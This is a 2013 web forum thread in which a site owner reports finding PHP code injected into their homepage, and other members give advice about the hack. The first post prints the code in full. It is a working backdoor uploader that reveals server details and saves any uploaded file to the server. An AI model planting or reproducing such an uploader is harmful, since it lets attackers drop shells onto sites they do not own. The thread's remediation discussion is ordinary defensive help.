1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

My Website Hacked

Discussion in 'Security' started by shuman202, Feb 17, 2013.

  1. #1
    today i found a wired php code on my homepage
    the code as the following
    Code (Text):
    1. <?php
    2. echo '<b><br><br>'.php_uname().'<br></b>';
    3. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    4. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    5. if( $_POST['_upl'] == "Upload" ) {
    6.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Uploaded Successfully</b><br><br>'; }
    7.     else { echo '<b>Upload Failed! </b><br><br>'; }
    8. }
    9. ?>
    i don't know what i should do?
    i have removed the code and is there anything else i should do?
    Solved! View solution.
    shuman202, Feb 17, 2013 IP
  2. #2
    Update your site to latest version if you are using any script, i would suggest as well to ask your provider to scan you site.
    3mints.info, Feb 17, 2013 IP
  3. humtuma

    humtuma Well-Known Member

    Messages:
    1,152
    Likes Received:
    21
    Best Answers:
    3
    Trophy Points:
    165
    #3
    You should have to update your website and ask your webhost about this problem.
    humtuma, Feb 17, 2013 IP
  4. shuman202

    shuman202 Active Member

    Messages:
    527
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    80
    Digital Goods:
    1
    #4
    this code was just printed as a clean code it didn't show any upload form maybe the hacker injected that code to the page but it didn't show any form to upload files
    anyawy i will check with my host about it..
    shuman202, Feb 17, 2013 IP
  5. AdamUK89

    AdamUK89 Active Member

    Messages:
    69
    Likes Received:
    1
    Best Answers:
    1
    Trophy Points:
    75
    #5
    Hi,

    Change your passwords aswell as an extra precaution

    Regards,
    Adam
    AdamUK89, Feb 20, 2013 IP
  6. scottlpool2003

    scottlpool2003 Well-Known Member

    Messages:
    1,703
    Likes Received:
    48
    Best Answers:
    9
    Trophy Points:
    100
    #6
    Yip, you've definitely had a hacking attempt.


    http://www.devnetwork.net/viewtopic.php?f=34&t=132136

    I think from further reading, it enables the hacker to upload a shell file directly to the server which obviously would have severe consequences if the server is not adequately secured. I'd strongly urge you to contact your host and alert them to this attempt.
    scottlpool2003, Feb 20, 2013 IP
  7. shuman202

    shuman202 Active Member

    Messages:
    527
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    80
    Digital Goods:
    1
    #7
    i contacted them and they have made an AV scan and the server was clean
    shuman202, Feb 20, 2013 IP
  8. scottlpool2003

    scottlpool2003 Well-Known Member

    Messages:
    1,703
    Likes Received:
    48
    Best Answers:
    9
    Trophy Points:
    100
    #8
    I don't think it was a virus, it was more a backdoor for the hacker to upload a shell file to the root of the server which wouldn't necessarily be picked up by an AV scan.
    scottlpool2003, Feb 21, 2013 IP
  9. shuman202

    shuman202 Active Member

    Messages:
    527
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    80
    Digital Goods:
    1
    #9
    i'm new to server administration , is there a quick think i can do to check if the hacker shell file to the root of my server
    shuman202, Feb 21, 2013 IP
  10. scottlpool2003

    scottlpool2003 Well-Known Member

    Messages:
    1,703
    Likes Received:
    48
    Best Answers:
    9
    Trophy Points:
    100
    #10
    I think your best bet is to contact whoever you rent it off and ask them what your next steps should be. Do you back your server up regularly? If so, make sure you take a local copy of the last backup before that hacking attempt just in case.
    scottlpool2003, Feb 21, 2013 IP